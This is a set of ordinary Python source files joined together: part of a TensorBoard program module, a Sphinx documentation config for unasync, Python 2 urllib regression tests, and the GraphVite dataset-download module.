start = time.time()
logger.info('TensorBoard reload process beginning')
for path, name in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logger.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logger.info('TensorBoard done reloading. Load took %0.3f secs', duration)
if load_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(load_interval)
if reload_task == 'process':
logger.info('Launching reload in a child process')
import multiprocessing
process = multiprocessing.Process(target=_reload, name='Reloader')
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif reload_task in ('thread', 'auto'):
logger.info('Launching reload in a daemon thread')
thread = threading.Thread(target=_reload, name='Reloader')
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif reload_task == 'blocking':
if load_interval != 0:
raise ValueError('blocking reload only allowed with load_interval=0')
_reload()
else:
raise ValueError('unrecognized reload_task: %s' % reload_task)
def create_sqlite_connection_provider(db_uri):
"""Returns function that returns SQLite Connection objects.
Args:
db_uri: A string URI expressing the DB file, e.g. "sqlite:~/tb.db".
Returns:
A function that returns a new PEP-249 DB Connection, which must be closed,
each time it is called.
Raises:
ValueError: If db_uri is not a valid sqlite file URI.
"""
uri = urlparse.urlparse(db_uri)
if uri.scheme != 'sqlite':
raise ValueError('Only sqlite DB URIs are supported: ' + db_uri)
if uri.netloc:
raise ValueError('Can not connect to SQLite over network: ' + db_uri)
if uri.path == ':memory:':
raise ValueError('Memory mode SQLite not supported: ' + db_uri)
path = os.path.expanduser(uri.path)
params = _get_connect_params(uri.query)
# TODO(@jart): Add thread-local pooling.
return lambda: sqlite3.connect(path, **params)
def _get_connect_params(query):
params = urlparse.parse_qs(query)
if any(len(v) > 2 for v in params.values()):
raise ValueError('DB URI params list has duplicate keys: ' + query)
return {k: json.loads(v[0]) for k, v in params.items()}
def _clean_path(path):
"""Removes a trailing slash from a non-root path.
Arguments:
path: The path of a request.
Returns:
The route to use to serve the request.
"""
if path != '/' and path.endswith('/'):
return path[:-1]
return path
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
class _DbModeMultiplexer(event_multiplexer.EventMultiplexer):
"""Shim EventMultiplexer to use when in read-only DB mode.
In read-only DB mode, the EventMultiplexer is nonfunctional - there is no
logdir to reload, and the data is all exposed via SQL. This class represents
the do-nothing EventMultiplexer for that purpose, which serves only as a
conduit for DB-related parameters.
The load APIs raise exceptions if called, and the read APIs always
return empty results.
"""
def __init__(self, db_uri, db_connection_provider):
"""Constructor for `_DbModeMultiplexer`.
Args:
db_uri: A URI to the database file in use.
db_connection_provider: Provider function for creating a DB connection.
"""
logger.info('_DbModeMultiplexer initializing for %s', db_uri)
super(_DbModeMultiplexer, self).__init__()
self.db_uri = db_uri
self.db_connection_provider = db_connection_provider
logger.info('_DbModeMultiplexer done initializing')
def AddRun(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def AddRunsFromDirectory(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def Reload(self):
"""Unsupported."""
raise NotImplementedError()
def make_plugin_loader(plugin_spec):
"""Returns a plugin loader for the given plugin.
Args:
plugin_spec: A TBPlugin subclass, or a TBLoader instance or subclass.
Returns:
A TBLoader for the given plugin.
:type plugin_spec:
Type[base_plugin.TBPlugin] | Type[base_plugin.TBLoader] |
base_plugin.TBLoader
:rtype: base_plugin.TBLoader
"""
if isinstance(plugin_spec, base_plugin.TBLoader):
return plugin_spec
if isinstance(plugin_spec, type):
if issubclass(plugin_spec, base_plugin.TBLoader):
return plugin_spec()
if issubclass(plugin_spec, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin_spec)
raise TypeError("Not a TBLoader or TBPlugin subclass: %r" % (plugin_spec,))
|
the-stack_0_1634 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Documentation build configuration file, created by
# sphinx-quickstart on Sat Jan 21 19:11:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# So autodoc can import our package
sys.path.insert(0, os.path.abspath("../.."))
# Warn about all references to unknown targets
nitpicky = True
# Except for these ones, which we expect to point to unknown targets:
nitpick_ignore = [
# Format is ("sphinx reference type", "string"), e.g.:
("py:obj", "bytes-like")
]
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.napoleon",
"sphinxcontrib_trio",
]
intersphinx_mapping = {
"python": ("https://docs.python.org/3", None),
"trio": ("https://trio.readthedocs.io/en/stable", None),
}
autodoc_member_order = "bysource"
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "unasync"
copyright = "The unasync authors"
author = "The unasync authors"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import unasync
version = unasync.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# The default language for :: blocks
highlight_language = "python3"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = 'alabaster'
# We have to set this ourselves, not only because it's useful for local
# testing, but also because if we don't then RTD will throw away our
# html_theme_options.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
# default is 2
# show deeper nesting in the RTD theme's sidebar TOC
# https://stackoverflow.com/questions/27669376/
# I'm not 100% sure this actually does anything with our current
# versions/settings...
"navigation_depth": 4,
"logo_only": True,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "unasyncdoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [(master_doc, "unasync.tex", "Trio Documentation", author, "manual")]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "unasync", "unasync Documentation", [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"unasync",
"unasync Documentation",
author,
"unasync",
"The async transformation code.",
"Miscellaneous",
)
]
|
the-stack_0_1636 | """Regresssion tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import mimetools
import StringIO
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "__iter__"):
self.assert_(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assert_(isinstance(file_num, int),
"fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it hear and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assert_(isinstance(self.returned_obj.info(), mimetools.Message))
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(StringIO.StringIO):
def sendall(self, str): pass
def makefile(self, mode, name): return self
def read(self, amt=None):
if self.closed: return ''
return StringIO.StringIO.read(self, amt)
def readline(self, length=None):
if self.closed: return ''
return StringIO.StringIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = FakeHTTPConnection
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a temporary file.
self.text = 'testing urllib.urlretrieve'
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
def tearDown(self):
# Delete the temporary file.
os.remove(test_support.TESTFN)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assert_(isinstance(result[1], mimetools.Message),
"did not get a mimetools.Message instance as second "
"returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
result = urllib.urlretrieve("file:%s" % test_support.TESTFN, second_temp)
self.assertEqual(second_temp, result[0])
self.assert_(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
finally:
FILE.close()
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assert_(isinstance(count, int))
self.assert_(isinstance(block_size, int))
self.assert_(isinstance(total_size, int))
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
urllib.urlretrieve(test_support.TESTFN, second_temp, hooktester)
os.remove(second_temp)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 ("Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using quote(): not all characters escaped; %s" %
result)
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assert_(expected in result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assert_(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assert_(expect in result,
"%s not found in %s" % (expect, result))
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
def test_main():
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests
)
if __name__ == '__main__':
test_main()
|
the-stack_0_1637 | # Copyright 2019 MilaGraph. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Zhaocheng Zhu
"""
Dataset module of GraphVite
Graph
- :class:`BlogCatalog`
- :class:`Youtube`
- :class:`Flickr`
- :class:`Hyperlink2012`
- :class:`Friendster`
- :class:`Wikipedia`
Knowledge Graph
- :class:`Math`
- :class:`FB15k`
- :class:`FB15k237`
- :class:`WN18`
- :class:`WN18RR`
- :class:`Wikidata5m`
- :class:`Freebase`
Visualization
- :class:`MNIST`
- :class:`CIFAR10`
- :class:`ImageNet`
"""
from __future__ import absolute_import, division
import os
import glob
import shutil
import logging
import gzip, zipfile, tarfile
import multiprocessing
from collections import defaultdict
import numpy as np
from . import cfg
logger = logging.getLogger(__name__)
class Dataset(object):
"""
Graph dataset.
Parameters:
name (str): name of dataset
urls (dict, optional): url(s) for each split,
can be either str or list of str
members (dict, optional): zip member(s) for each split,
leave empty for default
Datasets contain several splits, such as train, valid and test.
For each split, there are one or more URLs, specifying the file to download.
You may also specify the zip member to extract.
When a split is accessed, it will be automatically downloaded and decompressed
if it is not present.
You can assign a preprocess for each split, by defining a function with name [split]_preprocess::
class MyDataset(Dataset):
def __init__(self):
super(MyDataset, self).__init__(
"my_dataset",
train="url/to/train/split",
test="url/to/test/split"
)
def train_preprocess(self, input_file, output_file):
with open(input_file, "r") as fin, open(output_file, "w") as fout:
fout.write(fin.read())
f = open(MyDataset().train)
If the preprocess returns a non-trivial value, then it is assigned to the split,
otherwise the file name is assigned.
By convention, only splits ending with ``_data`` have non-trivial return value.
See also:
Pre-defined preprocess functions
:func:`csv2txt`,
:func:`top_k_label`,
:func:`induced_graph`,
:func:`edge_split`,
:func:`link_prediction_split`,
:func:`image_feature_data`
"""
def __init__(self, name, urls=None, members=None):
self.name = name
self.urls = urls or {}
self.members = members or {}
for key in self.urls:
if isinstance(self.urls[key], str):
self.urls[key] = [self.urls[key]]
if key not in self.members:
self.members[key] = [None] * len(self.urls[key])
elif isinstance(self.members[key], str):
self.members[key] = [self.members[key]]
if len(self.urls[key]) != len(self.members[key]):
raise ValueError("Number of members is inconsistent with number of urls in `%s`" % key)
self.path = os.path.join(cfg.dataset_path, self.name)
def relpath(self, path):
return os.path.relpath(path, self.path)
def download(self, url):
from six.moves.urllib.request import urlretrieve
save_file = os.path.basename(url)
if "?" in save_file:
save_file = save_file[:save_file.find("?")]
save_file = os.path.join(self.path, save_file)
if save_file in self.local_files():
return save_file
logger.info("downloading %s to %s" % (url, self.relpath(save_file)))
urlretrieve(url, save_file)
return save_file
def extract(self, zip_file, member=None):
zip_name, extension = os.path.splitext(zip_file)
if zip_name.endswith(".tar"):
extension = ".tar" + extension
zip_name = zip_name[:-4]
if extension == ".txt":
return zip_file
elif member is None:
save_file = zip_name
else:
save_file = os.path.join(os.path.dirname(zip_name), os.path.basename(member))
if save_file in self.local_files():
return save_file
if extension == ".gz":
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with gzip.open(zip_file, "rb") as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
elif extension == ".tar.gz" or extension == ".tar":
if member is None:
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with tarfile.open(zip_file, "r") as fin:
fin.extractall(save_file)
else:
logger.info("extracting %s from %s to %s" % (member, self.relpath(zip_file), self.relpath(save_file)))
with tarfile.open(zip_file, "r").extractfile(member) as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
elif extension == ".zip":
if member is None:
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with zipfile.ZipFile(zip_file) as fin:
fin.extractall(save_file)
else:
logger.info("extracting %s from %s to %s" % (member, self.relpath(zip_file), self.relpath(save_file)))
with zipfile.ZipFile(zip_file).open(member, "r") as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
else:
raise ValueError("Unknown file extension `%s`" % extension)
return save_file
def get_file(self, key):
file_name = os.path.join(self.path, "%s_%s.txt" % (self.name, key))
if file_name in self.local_files():
return file_name
urls = self.urls[key]
members = self.members[key]
preprocess_name = key + "_preprocess"
preprocess = getattr(self, preprocess_name, None)
if len(urls) > 1 and preprocess is None:
raise AttributeError(
"There are non-trivial number of files, but function `%s` is not found" % preprocess_name)
extract_files = []
for url, member in zip(urls, members):
download_file = self.download(url)
extract_file = self.extract(download_file, member)
extract_files.append(extract_file)
if preprocess:
result = preprocess(*(extract_files + [file_name]))
if result is not None:
return result
elif os.path.isfile(extract_files[0]):
logger.info("renaming %s to %s" % (self.relpath(extract_files[0]), self.relpath(file_name)))
shutil.move(extract_files[0], file_name)
else:
raise AttributeError(
"There are non-trivial number of files, but function `%s` is not found" % preprocess_name)
return file_name
def local_files(self):
if not os.path.exists(self.path):
os.mkdir(self.path)
return set(glob.glob(os.path.join(self.path, "*")))
def __getattr__(self, key):
if key in self.__dict__:
return self.__dict__[key]
if key in self.urls:
return self.get_file(key)
raise AttributeError("Can't resolve split `%s`" % key)
def csv2txt(self, csv_file, txt_file):
"""
Convert ``csv`` to ``txt``.
Parameters:
csv_file: csv file
txt_file: txt file
"""
logger.info("converting %s to %s" % (self.relpath(csv_file), self.relpath(txt_file)))
with open(csv_file, "r") as fin, open(txt_file, "w") as fout:
for line in fin:
fout.write(line.replace(",", "\t"))
def top_k_label(self, label_file, save_file, k, format="node-label"):
"""
Extract top-k labels.
Parameters:
label_file (str): label file
save_file (str): save file
k (int): top-k labels will be extracted
format (str, optional): format of label file,
can be 'node-label' or '(label)-nodes':
- **node-label**: each line is [node] [label]
- **(label)-nodes**: each line is [node]..., no explicit label
"""
logger.info("extracting top-%d labels of %s to %s" % (k, self.relpath(label_file), self.relpath(save_file)))
if format == "node-label":
label2nodes = defaultdict(list)
with open(label_file, "r") as fin:
for line in fin:
node, label = line.split()
label2nodes[label].append(node)
elif format == "(label)-nodes":
label2nodes = {}
with open(label_file, "r") as fin:
for i, line in enumerate(fin):
label2nodes[i] = line.split()
else:
raise ValueError("Unknown file format `%s`" % format)
labels = sorted(label2nodes, key=lambda x: len(label2nodes[x]), reverse=True)[:k]
with open(save_file, "w") as fout:
for label in sorted(labels):
for node in sorted(label2nodes[label]):
fout.write("%s\t%s\n" % (node, label))
def induced_graph(self, graph_file, label_file, save_file):
"""
Induce a subgraph from labeled nodes. All edges in the induced graph have at least one labeled node.
Parameters:
graph_file (str): graph file
label_file (str): label file
save_file (str): save file
"""
logger.info("extracting subgraph of %s induced by %s to %s" %
(self.relpath(graph_file), self.relpath(label_file), self.relpath(save_file)))
nodes = set()
with open(label_file, "r") as fin:
for line in fin:
nodes.update(line.split())
with open(graph_file, "r") as fin, open(save_file, "w") as fout:
for line in fin:
if not line.startswith("#"):
u, v = line.split()
if u not in nodes or v not in nodes:
continue
fout.write("%s\t%s\n" % (u, v))
def edge_split(self, graph_file, files, portions):
"""
Divide a graph into several splits.
Parameters:
graph_file (str): graph file
files (list of str): file names
portions (list of float): split portions
"""
assert len(files) == len(portions)
logger.info("splitting graph %s into %s" %
(self.relpath(graph_file), ", ".join([self.relpath(file) for file in files])))
np.random.seed(1024)
portions = np.cumsum(portions, dtype=np.float32) / np.sum(portions)
files = [open(file, "w") for file in files]
with open(graph_file, "r") as fin:
for line in fin:
i = np.searchsorted(portions, np.random.rand())
files[i].write(line)
for file in files:
file.close()
def link_prediction_split(self, graph_file, files, portions):
"""
Divide a normal graph into a train split and several test splits for link prediction use.
Each test split contains half true and half false edges.
Parameters:
graph_file (str): graph file
files (list of str): file names,
the first file is treated as train file
portions (list of float): split portions
"""
assert len(files) == len(portions)
logger.info("splitting graph %s into %s" %
(self.relpath(graph_file), ", ".join([self.relpath(file) for file in files])))
np.random.seed(1024)
nodes = set()
edges = set()
portions = np.cumsum(portions, dtype=np.float32) / np.sum(portions)
files = [open(file, "w") for file in files]
num_edges = [0] * len(files)
with open(graph_file, "r") as fin:
for line in fin:
u, v = line.split()[:2]
nodes.update([u, v])
edges.add((u, v))
i = np.searchsorted(portions, np.random.rand())
if i == 0:
files[i].write(line)
else:
files[i].write("%s\t%s\t1\n" % (u, v))
num_edges[i] += 1
nodes = list(nodes)
for file, num_edge in zip(files[1:], num_edges[1:]):
for _ in range(num_edge):
valid = False
while not valid:
u = nodes[int(np.random.rand() * len(nodes))]
v = nodes[int(np.random.rand() * len(nodes))]
valid = u != v and (u, v) not in edges and (v, u) not in edges
file.write("%s\t%s\t0\n" % (u, v))
for file in files:
file.close()
def image_feature_data(self, dataset, model="resnet50", batch_size=128):
"""
Compute feature vectors for an image dataset using a neural network.
Parameters:
dataset (torch.utils.data.Dataset): dataset
model (str or torch.nn.Module, optional): pretrained model.
